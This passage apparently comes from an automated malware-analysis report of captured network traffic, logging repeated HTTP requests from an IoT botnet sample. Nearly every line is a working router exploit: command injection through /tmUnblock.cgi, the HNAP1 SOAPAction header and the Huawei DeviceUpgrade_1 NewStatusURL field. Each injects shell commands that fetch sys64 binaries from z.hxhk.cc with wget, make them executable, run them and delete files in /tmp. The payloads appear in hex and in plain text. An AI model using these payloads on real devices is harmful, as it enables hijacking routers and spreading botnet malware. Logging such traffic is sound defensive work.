74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 